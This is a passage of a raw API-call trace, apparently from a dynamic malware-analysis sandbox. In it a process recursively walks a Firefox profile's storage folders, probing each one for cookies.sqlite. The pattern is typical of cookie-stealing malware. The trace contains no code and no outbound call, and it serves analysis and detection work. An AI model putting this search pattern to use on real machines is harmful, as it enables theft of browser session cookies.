returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\*" [0251.240] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\sessionstore-backups\\*", lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0x5c0f850 [0251.241] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 1 [0251.241] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.241] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 1 [0251.241] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.241] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 1 [0251.241] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.241] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0 [0251.241] FindClose (in: hFindFile=0x5c0f850 | out: hFindFile=0x5c0f850) returned 1 [0251.242] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0251.242] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.242] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0251.242] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.242] FindNextFileW (in: hFindFile=0x4404d90, lpFindFileData=0x7aaf140 | out: lpFindFileData=0x7aaf140) returned 1 [0251.242] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.242] lstrlenW (lpString="storage") returned 7 [0251.242] PathCombineW (in: pszDest=0x79b1400, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", pszFile="storage" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage" [0251.242] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x58 [0251.242] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage", lpDst=0x7aaf3a0, nSize=0x58 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage") returned 0x58 [0251.242] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage") returned 87 [0251.242] lstrlenW (lpString="cookies.sqlite") returned 14 [0251.242] PathCombineW (in: pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage", pszFile="cookies.sqlite" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\cookies.sqlite" [0251.242] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\cookies.sqlite", lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0xffffffffffffffff [0251.245] PathCombineW (in: pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\*" [0251.245] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\*", lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 0x5c0feb0 [0251.245] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 1 [0251.246] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.246] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x79b1750 | out: lpFindFileData=0x79b1750) returned 1 [0251.246] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.246] lstrlenW (lpString="permanent") returned 9 [0251.246] PathCombineW (in: pszDest=0x79b19b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage", pszFile="permanent" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent" [0251.246] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x62 [0251.246] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent", lpDst=0x79c5700, nSize=0x62 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent") returned 0x62 [0251.246] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent") returned 97 [0251.246] lstrlenW (lpString="cookies.sqlite") returned 14 [0251.246] PathCombineW (in: pszDest=0x79c57d0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent", pszFile="cookies.sqlite" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\cookies.sqlite" [0251.246] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\cookies.sqlite", lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0xffffffffffffffff [0251.246] PathCombineW (in: pszDest=0x79c57d0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\*" [0251.246] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\*", lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 0x5c103f0 [0251.246] FindNextFileW (in: hFindFile=0x5c103f0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0251.246] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.246] FindNextFileW (in: hFindFile=0x5c103f0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0251.246] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.246] lstrlenW (lpString="chrome") returned 6 [0251.246] PathCombineW (in: pszDest=0x79c57d0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent", pszFile="chrome" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome" [0251.247] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x69 [0251.247] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome", lpDst=0x79c5c40, nSize=0x69 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome") returned 0x69 [0251.247] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome") returned 104 [0251.247] lstrlenW (lpString="cookies.sqlite") returned 14 [0251.247] PathCombineW (in: pszDest=0x79c5d20, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome", pszFile="cookies.sqlite" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\cookies.sqlite" [0251.247] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\cookies.sqlite", lpFindFileData=0x79c59e0 | out: lpFindFileData=0x79c59e0) returned 0xffffffffffffffff [0251.247] PathCombineW (in: pszDest=0x79c5d20, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\*" [0251.247] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\*", lpFindFileData=0x79c59e0 | out: lpFindFileData=0x79c59e0) returned 0x5c0f850 [0251.247] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x79c59e0 | out: lpFindFileData=0x79c59e0) returned 1 [0251.247] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.247] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x79c59e0 | out: lpFindFileData=0x79c59e0) returned 1 [0251.247] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.247] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x79c59e0 | out: lpFindFileData=0x79c59e0) returned 1 [0251.247] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.247] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x79c59e0 | out: lpFindFileData=0x79c59e0) returned 1 [0251.247] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.247] lstrlenW (lpString="idb") returned 3 [0251.247] PathCombineW (in: pszDest=0x79c5d20, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome", pszFile="idb" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb" [0251.247] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x6d [0251.247] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb", lpDst=0x79c7bb0, nSize=0x6d | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb") returned 0x6d [0251.247] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb") returned 108 [0251.247] lstrlenW (lpString="cookies.sqlite") returned 14 [0251.248] PathCombineW (in: pszDest=0x79c7ca0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb", pszFile="cookies.sqlite" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\cookies.sqlite" [0251.248] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\cookies.sqlite", lpFindFileData=0x79c7950 | out: lpFindFileData=0x79c7950) returned 0xffffffffffffffff [0251.261] PathCombineW (in: pszDest=0x79c7ca0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\*" [0251.261] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\*", lpFindFileData=0x79c7950 | out: lpFindFileData=0x79c7950) returned 0x5c0f2b0 [0251.262] FindNextFileW (in: hFindFile=0x5c0f2b0, lpFindFileData=0x79c7950 | out: lpFindFileData=0x79c7950) returned 1 [0251.262] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.262] FindNextFileW (in: hFindFile=0x5c0f2b0, lpFindFileData=0x79c7950 | out: lpFindFileData=0x79c7950) returned 1 [0251.262] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.262] lstrlenW (lpString="2918063365piupsah.files") returned 23 [0251.262] PathCombineW (in: pszDest=0x79c7ca0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb", pszFile="2918063365piupsah.files" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files" [0251.262] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x85 [0251.262] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files", lpDst=0x79c8110, nSize=0x85 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files") returned 0x85 [0251.262] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files") returned 132 [0251.262] lstrlenW (lpString="cookies.sqlite") returned 14 [0251.262] PathCombineW (in: pszDest=0x79c8230, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files", pszFile="cookies.sqlite" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\cookies.sqlite" [0251.262] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\cookies.sqlite", lpFindFileData=0x79c7eb0 | out: lpFindFileData=0x79c7eb0) returned 0xffffffffffffffff [0251.263] PathCombineW (in: pszDest=0x79c8230, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\*" [0251.263] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\*", lpFindFileData=0x79c7eb0 | out: lpFindFileData=0x79c7eb0) returned 0x5c0f970 [0251.263] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x79c7eb0 | out: lpFindFileData=0x79c7eb0) returned 1 [0251.263] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.263] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x79c7eb0 | out: lpFindFileData=0x79c7eb0) returned 0 [0251.263] FindClose (in: hFindFile=0x5c0f970 | out: hFindFile=0x5c0f970) returned 1 [0251.263] FindNextFileW (in: hFindFile=0x5c0f2b0, lpFindFileData=0x79c7950 | out: lpFindFileData=0x79c7950) returned 1 [0251.263] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.263] FindNextFileW (in: hFindFile=0x5c0f2b0, lpFindFileData=0x79c7950 | out: lpFindFileData=0x79c7950) returned 0 [0251.263] FindClose (in: hFindFile=0x5c0f2b0 | out: hFindFile=0x5c0f2b0) returned 1 [0251.263] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x79c59e0 | out: lpFindFileData=0x79c59e0) returned 0 [0251.263] FindClose (in: hFindFile=0x5c0f850 | out: hFindFile=0x5c0f850) returned 1 [0251.263] FindNextFileW (in: hFindFile=0x5c103f0, lpFindFileData=0x79c54a0 | out: lpFindFileData=0x79c54a0) returned 1 [0251.263] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.264] lstrlenW (lpString="moz-safe-about+home") returned 19 [0251.264] PathCombineW (in: pszDest=0x79c57d0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent", pszFile="moz-safe-about+home" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home" [0251.264] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x76 [0251.264] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home", lpDst=0x79c5c40, nSize=0x76 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home") returned 0x76 [0251.264] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home") returned 117 [0251.264] lstrlenW (lpString="cookies.sqlite") returned 14 [0251.264] PathCombineW (in: pszDest=0x79c5d40, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home", pszFile="cookies.sqlite" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\cookies.sqlite" [0251.264] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\cookies.sqlite", lpFindFileData=0x79c59e0 | out: lpFindFileData=0x79c59e0) returned 0xffffffffffffffff [0251.266] PathCombineW (in: pszDest=0x79c5d40, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\*" [0251.266] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\*", lpFindFileData=0x79c59e0 | out: lpFindFileData=0x79c59e0) returned 0x5c0f850 [0251.266] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x79c59e0 | out: lpFindFileData=0x79c59e0) returned 1 [0251.266] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.266] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x79c59e0 | out: lpFindFileData=0x79c59e0) returned 1 [0251.266] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.266] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x79c59e0 | out: lpFindFileData=0x79c59e0) returned 1 [0251.266] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.266] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x79c59e0 | out: lpFindFileData=0x79c59e0) returned 1 [0251.266] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.266] lstrlenW (lpString="idb") returned 3 [0251.266] PathCombineW (in: pszDest=0x79c5d40, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home", pszFile="idb" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb" [0251.266] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x7a [0251.266] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb", lpDst=0x79c7bb0, nSize=0x7a | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb") returned 0x7a [0251.266] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb") returned 121 [0251.266] lstrlenW (lpString="cookies.sqlite") returned 14 [0251.267] PathCombineW (in: pszDest=0x79c7cb0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb", pszFile="cookies.sqlite" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\cookies.sqlite" [0251.267] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\cookies.sqlite", lpFindFileData=0x79c7950 | out: lpFindFileData=0x79c7950) returned 0xffffffffffffffff [0251.308] PathCombineW (in: 